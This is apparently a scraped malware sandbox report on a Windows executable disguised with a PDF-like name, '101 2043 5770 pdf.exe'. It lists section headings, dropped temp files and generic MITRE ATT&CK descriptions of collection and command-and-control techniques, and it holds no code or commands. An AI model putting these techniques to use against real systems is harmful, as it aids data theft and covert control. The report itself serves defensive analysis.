Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\101 2043 5770 pdf.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\DB1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3t2u5h2o.oqr.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lxxqwri.2qj.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_a10rzeiw.wi0.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_avprntir.zqq.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gg1v4u5h.mmf.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j4bjxsig.dqv.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mnjuhh3v.2it.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sdivv3yg.yzh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_teqsfm3t.doy.ps1

Windows Analysis Report
101 2043 5770 pdf.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre